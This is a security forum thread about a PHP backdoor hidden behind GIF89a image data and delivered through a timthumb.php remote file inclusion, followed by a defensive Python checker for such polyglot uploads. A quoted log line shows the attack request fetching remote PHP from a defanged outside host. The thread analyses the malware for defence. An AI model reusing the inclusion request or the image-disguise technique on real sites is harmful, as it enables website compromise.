Backdoor php not detected?

See: https://www.virustotal.com/url/801e01b1e0757edcb07201e4fd4b35fe927a23c7b75a320a22b8da015ec19cd0/analysis/1328823773/
and
http://vscan.urlvoid.com/analysis/f42e63123f17e6692ff5bb67ed793aad/amFtaWxhLXBocA==/
RFI malware listed at critical security as -196.36.89.12,09/Feb/2012:03:20:03 +0100,hxxp://picasa.com.dk-cell.com.mx/jamila.php,/misc//wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=hxxp://picasa.com.dk-cell.com.mx/jamila.php HTTP/1.1
See: -http://jsunpack.jeek.org/?report=6bd6e499bead9eab1736f5529a27c2fb0ddca085 (Go to last mentioned link only if security savvy, with ample script protection and in a VM),
Random vulnerability. For a description see: http://www.metod.si/random-vulnerability-disected/ link from SimpleFolia, article author razno - it has obfuscated PHP code behind the binary data in a file that initially tries to disguise itself as a GIF image – GIF89a.

polonus

VirusTotal
https://www.virustotal.com/file/2bcc7261416bcef8da36472e889404cc2d11e8063dbbd70e85585e11c075bfa4/analysis/1328824642/

And with this malware, there is use of “End Of Transmission” as well as many other abnormal hex values for a website. See the complete list attached.

Hi Donovansrb10,

The EOT there is marking the end of the gif data source file, separating it from the PHP backdoor code part.
That is why I run the webbug detector extension in Google Chrome to be aware of webbugs on a page, but normally webbugs are not infected via RFI.
Inside the code we find → $lol is $_GET['lol']; ← (is equals = pol); lots of this particular RFI can be found via RFI logs.

polonus
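
A defender-side check for the disguise described in this thread (a GIF89a header with PHP sitting behind the image data), added here as an example and not code from any of the posters. It walks the GIF block structure to find where the image really ends, then reports trailing bytes and PHP open tags; the function names and sample bytes are constructed for illustration.

```python
import re

GIF_MAGIC = (b"GIF87a", b"GIF89a")
PHP_TAG = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)  # short "<? " tags not covered

def _skip_sub_blocks(data, pos):
    """Advance past a chain of length-prefixed sub-blocks (terminated by 0x00)."""
    while True:
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size

def gif_end_offset(data):
    """Offset just past the GIF trailer (0x3B), or None if the structure is broken."""
    if len(data) < 13 or data[:6] not in GIF_MAGIC:
        return None
    pos = 13                                   # header (6) + logical screen descriptor (7)
    if data[10] & 0x80:                        # global colour table present
        pos += 3 * (2 << (data[10] & 0x07))
    try:
        while True:
            block = data[pos]
            if block == 0x3B:                  # trailer: image data ends here
                return pos + 1
            if block == 0x21:                  # extension: introducer, label, sub-blocks
                pos = _skip_sub_blocks(data, pos + 2)
            elif block == 0x2C:                # image descriptor (10 bytes)
                flags = data[pos + 9]
                pos += 10
                if flags & 0x80:               # local colour table
                    pos += 3 * (2 << (flags & 0x07))
                pos = _skip_sub_blocks(data, pos + 1)   # +1 skips LZW minimum code size
            else:
                return None
    except IndexError:                         # ran off the end: truncated or fake GIF
        return None

def inspect_upload(data):
    """Report on a file that may be a GIF with code hidden behind the image data."""
    end = gif_end_offset(data)
    return {"claims_gif": data[:6] in GIF_MAGIC,
            "well_formed": end is not None,
            "trailing_bytes": None if end is None else len(data) - end,
            "php_tag_offsets": [m.start() for m in PHP_TAG.finditer(data)]}

# Constructed samples: a minimal 1x1 GIF, and the same image followed by EOT (0x04)
# and an inert PHP comment standing in for appended code.
CLEAN_GIF = bytes.fromhex("474946383961 01000100800000 000000ffffff 2c000000000100010000 02 024401 00 3b")
POLYGLOT = CLEAN_GIF + b"\x04<?php /* constructed placeholder */ ?>"
```

A file that claims to be a GIF but is not well formed, has bytes after the trailer, or contains a PHP open tag anywhere should be rejected or quarantined rather than stored where the web server will execute it.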